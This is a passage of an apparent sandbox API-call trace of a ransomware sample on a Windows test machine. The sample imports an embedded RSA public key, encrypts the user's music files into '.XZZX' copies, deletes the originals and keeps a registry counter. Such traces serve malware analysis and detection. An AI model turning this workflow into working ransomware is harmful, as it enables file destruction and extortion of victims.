(in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0117.878] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0117.878] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc5ff8) returned 1 [0117.878] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc5ff8, dwCertEncodingType=0x1, pInfo=0x3cb0b38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0b68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0b70*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a58d0) returned 1 [0117.879] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.879] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0117.879] CryptEncrypt (in: hKey=0x3a58d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0117.879] CryptEncrypt (in: hKey=0x3a58d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc6080*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc6080*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0117.880] WriteFile (in: hFile=0x558, lpBuffer=0x3cc6080*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc6080*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0117.880] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0117.880] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.880] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0117.880] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0117.880] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x55c) returned 0x0 [0117.880] RegQueryValueExW (in: hKey=0x55c, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x6f, lpcbData=0x420dfdc*=0x4) returned 0x0 [0117.880] RegCloseKey (hKey=0x55c) returned 0x0 [0117.880] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x55c) returned 0x0 [0117.881] RegSetValueExW (in: hKey=0x55c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x70, cbData=0x4 | out: lpData=0x420dfec*=0x70) returned 0x0 [0117.881] RegCloseKey (hKey=0x55c) returned 0x0 [0117.881] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.881] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.881] CloseHandle (hObject=0x558) returned 1 [0117.883] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0117.884] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0117.884] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\dTOAV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dtoav.wav")) returned 1 [0117.885] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\dTOAV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dtoav.wav")) returned 0 Thread: id = 376 os_tid = 0x8e8 [0117.885] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.885] lstrcpyW (in: lpString1=0x434f460, lpString2="j3v_bMSa tx-.m4a" | out: lpString1="j3v_bMSa tx-.m4a") returned="j3v_bMSa tx-.m4a" [0117.886] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.886] SetErrorMode (uMode=0x1) returned 0x1 [0117.886] lstrcpyW (in: lpString1=0x434f860, lpString2="j3v_bMSa tx-.m4a" | out: lpString1="j3v_bMSa tx-.m4a") returned="j3v_bMSa tx-.m4a" [0117.886] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x4d0a1700, Data2=0x4d3d, Data3=0x40ab, Data4=([0]=0x9c, [1]=0xe5, [2]=0xd, [3]=0x75, [4]=0x74, [5]=0xb1, [6]=0x4a, [7]=0xb9))) returned 0x0 [0117.886] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\j3v_bMSa tx-.m4a") returned 89 [0117.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0117.886] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\64527B001382D7BF4D0A170017B7BC07.XZZX") returned 110 [0117.886] StrStrW (lpFirst="j3v_bMSa tx-.m4a", lpSrch="XZZX") returned 0x0 [0117.886] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\j3v_bMSa tx-.m4a", dwFileAttributes=0x20) returned 1 [0117.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\j3v_bMSa tx-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\j3v_bmsa tx-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0117.886] ReadFile (in: hFile=0x54c, lpBuffer=0x3cc9980, nNumberOfBytesToRead=0x114f9, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesRead=0x434e418*=0x114f9, lpOverlapped=0x0) returned 1 [0117.888] CloseHandle (hObject=0x54c) returned 1 [0117.888] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0117.888] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0117.889] SetErrorMode (uMode=0x1) returned 0x1 [0117.889] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0117.889] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6108) returned 1 [0117.891] CryptGenKey (in: hProv=0x3cc6108, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0117.991] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0117.991] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x434e41c | out: pbData=0x40e0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0117.991] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.992] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0117.992] CryptDestroyKey (hKey=0x3a5710) returned 1 [0117.992] CryptReleaseContext (hProv=0x3cc6108, dwFlags=0x0) returned 1 [0117.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\64527B001382D7BF4D0A170017B7BC07.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\64527b001382d7bf4d0a170017b7bc07.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0117.993] WriteFile (in: hFile=0x54c, lpBuffer=0x3cc9980*, nNumberOfBytesToWrite=0x114f9, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesWritten=0x434e438*=0x114f9, lpOverlapped=0x0) returned 1 [0117.994] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x114f9 [0117.994] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0117.994] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x114fe [0117.994] WriteFile (in: hFile=0x54c, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x20, lpOverlapped=0x0) returned 1 [0117.994] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1151e [0117.994] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0117.995] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11523 [0117.995] SetErrorMode (uMode=0x1) returned 0x1 [0117.995] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0117.995] OutputDebugStringW (lpOutputString="end") [0117.995] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0117.995] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0117.995] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cc6108) returned 1 [0117.996] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6108, dwCertEncodingType=0x1, pInfo=0x3cb0c08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0c38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0c40*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3a5910) returned 1 [0117.996] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.997] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0117.997] CryptEncrypt (in: hKey=0x3a5910, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0117.997] CryptEncrypt (in: hKey=0x3a5910, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc6190*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc6190*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0117.997] WriteFile (in: hFile=0x54c, lpBuffer=0x3cc6190*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc6190*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0117.997] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0117.997] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0117.997] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0117.997] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0117.997] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x55c) returned 0x0 [0117.997] RegQueryValueExW (in: hKey=0x55c, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x70, lpcbData=0x434dfdc*=0x4) returned 0x0 [0117.997] RegCloseKey (hKey=0x55c) returned 0x0 [0117.997] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x55c) returned 0x0 [0117.998] RegSetValueExW (in: hKey=0x55c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x71, cbData=0x4 | out: lpData=0x434dfec*=0x71) returned 0x0 [0117.998] RegCloseKey (hKey=0x55c) returned 0x0 [0117.998] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.998] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.998] CloseHandle (hObject=0x54c) returned 1 [0118.000] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0118.000] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0118.000] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\j3v_bMSa tx-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\j3v_bmsa tx-.m4a")) returned 1 [0118.001] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\j3v_bMSa tx-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\j3v_bmsa tx-.m4a")) returned 0 Thread: id = 377 os_tid = 0x8ec [0118.005] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.005] lstrcpyW (in: lpString1=0x420f460, lpString2="jtsnNF8Wy Jt.m4a" | out: lpString1="jtsnNF8Wy Jt.m4a") returned="jtsnNF8Wy Jt.m4a" [0118.005] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.005] SetErrorMode (uMode=0x1) returned 0x1 [0118.005] lstrcpyW (in: lpString1=0x420f860, lpString2="jtsnNF8Wy Jt.m4a" | out: lpString1="jtsnNF8Wy Jt.m4a") returned="jtsnNF8Wy Jt.m4a" [0118.005] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xac42f627, Data2=0x8bf8, Data3=0x48a6, Data4=([0]=0xa5, [1]=0x28, [2]=0x4d, [3]=0xb6, [4]=0x36, [5]=0x49, [6]=0x56, [7]=0x12))) returned 0x0 [0118.005] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\jtsnNF8Wy Jt.m4a") returned 89 [0118.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0118.005] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\3C85A2C827B882D0AC42F6272BD96718.XZZX") returned 110 [0118.005] StrStrW (lpFirst="jtsnNF8Wy Jt.m4a", lpSrch="XZZX") returned 0x0 [0118.005] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\jtsnNF8Wy Jt.m4a", dwFileAttributes=0x20) returned 1 [0118.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\jtsnNF8Wy Jt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\jtsnnf8wy jt.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0118.005] ReadFile (in: hFile=0x558, lpBuffer=0x3cc9980, nNumberOfBytesToRead=0x923d, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesRead=0x420e418*=0x923d, lpOverlapped=0x0) returned 1 [0118.006] CloseHandle (hObject=0x558) returned 1 [0118.007] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0118.007] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0118.007] SetErrorMode (uMode=0x1) returned 0x1 [0118.007] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0118.007] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6218) returned 1 [0118.009] CryptGenKey (in: hProv=0x3cc6218, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0118.135] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0118.135] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0118.135] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.135] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0118.135] CryptDestroyKey (hKey=0x3a5710) returned 1 [0118.135] CryptReleaseContext (hProv=0x3cc6218, dwFlags=0x0) returned 1 [0118.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\3C85A2C827B882D0AC42F6272BD96718.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\3c85a2c827b882d0ac42f6272bd96718.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0118.136] WriteFile (in: hFile=0x558, lpBuffer=0x3cc9980*, nNumberOfBytesToWrite=0x923d, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesWritten=0x420e438*=0x923d, lpOverlapped=0x0) returned 1 [0118.137] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x923d [0118.137] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.137] SetFilePointer (in: 